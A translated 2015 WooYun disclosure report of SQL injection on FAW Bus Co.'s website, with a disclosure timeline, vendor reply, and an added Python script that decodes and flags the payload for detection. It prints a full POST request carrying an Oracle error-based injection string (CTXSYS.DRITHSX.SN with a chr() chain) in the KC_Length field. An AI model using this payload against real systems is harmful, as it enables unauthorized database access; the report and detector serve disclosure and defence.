Vulnerability summary

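Bug ID: wooyun-2015-0143259

Title: Serious SQL vulnerability on the FAW Bus official website (59 databases involved)

Vendor: FAW Bus Co., Ltd. (一汽客车有限公司)

Author: 霝z

Submitted: 2015-10-14 17:39

Fixed: 2015-12-03 08:48

Made public: 2015-12-03 08:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]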

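Vulnerability details

Disclosure status:

2015-10-14: Details reported to the vendor; waiting for the vendor to handle them
2015-10-19: Vendor confirmed; details disclosed to the vendor only
2015-10-29: Details disclosed to core white hats and experts in the relevant field
2015-11-08: Details disclosed to regular white hats
2015-11-18: Details disclosed to trainee white hats
2015-12-03: Details disclosed to the public

Brief description:

As stated in the title.

Detailed description:

1. Injection point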

POST /cpzt/kcproduct.jsp?pros=3&where=3&Type=004004 HTTP/1.1
Cache-Control: no-cache
Referer: http://**.**.**.**/cpzt/kcproduct.jsp?where=&Type=004004&pros=
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
Host: **.**.**.**
Cookie: JSESSIONID=Q2JzWBKTD1DxnYZfwcVmYCvX7QQFgXvM3n5jwdGmyfwWw1myWVlv!1092529893
Accept-Encoding: gzip, deflate
Content-Length: 234
Content-Type: application/x-www-form-urlencoded

button=3&KC_Length=%27%7c%7cCTXSYS.DRITHSX.SN(user%2c(select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97)+from+DUAL))%7c%7c%27&KC_USE=1


2. Databases involved:

available databases [59]:


3. Tables of one of the databases:

Database: FAW_FWKC
[55 tables]

Proof of vulnerability:

As above.

Fix:

Filtering.

Copyright notice: when reposting, please credit the source 霝z@乌云 (WooYun)
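
A detection-side view of the request in section 1, as an added example that is not part of the original report: it URL-decodes the posted form body, flags the constructs visible in the `KC_Length` value, and spells out the literal hidden in the `chr()` chain. The rule names and function names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl

# Form body copied verbatim from the request in section 1 of this report.
REPORT_BODY = (
    "button=3&KC_Length=%27%7c%7cCTXSYS.DRITHSX.SN(user%2c(select+chr(95)"
    "%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)"
    "%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97)"
    "+from+DUAL))%7c%7c%27&KC_USE=1"
)

# Rule names are hypothetical; each pattern matches a construct visible in
# the decoded KC_Length value, nothing beyond what the report shows.
CHR_CALL = r"chr\(\s*\d{1,3}\s*\)"
RULES = {
    "quote_then_concat": re.compile(r"'\s*\|\|"),
    "ctxsys_drithsx_sn": re.compile(r"\bctxsys\.drithsx\.sn\s*\(", re.I),
    "subquery_from_dual": re.compile(r"\(\s*select\b.+?\bfrom\s+dual\b", re.I | re.S),
    "chr_chain": re.compile(rf"(?:{CHR_CALL}\s*\|\|\s*){{2,}}{CHR_CALL}", re.I),
}


def decode_chr_chain(value):
    """Return the literal spelled out by a chr(n)||chr(n)... chain, or None."""
    match = RULES["chr_chain"].search(value)
    if match is None:
        return None
    codes = re.findall(r"chr\(\s*(\d{1,3})\s*\)", match.group(0), re.I)
    return "".join(chr(int(code)) for code in codes)


def inspect_form_body(body):
    """URL-decode a form body and map each suspicious parameter to its hits."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = [rule for rule, pattern in RULES.items() if pattern.search(value)]
        if hits:
            findings[name] = {"rules": hits, "marker": decode_chr_chain(value)}
    return findings


if __name__ == "__main__":
    for name, finding in inspect_form_body(REPORT_BODY).items():
        print(name, finding["rules"], "marker:", finding["marker"])
```

Matching like this suits log review and alerting on the request shape shown in the report; it does not replace fixing how the page handles `KC_Length`.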


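Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-10-19 08:47

Vendor reply:

No direct handling channel with the organisation that manages the website has been established yet; awaiting claim.

Latest status:

None yet.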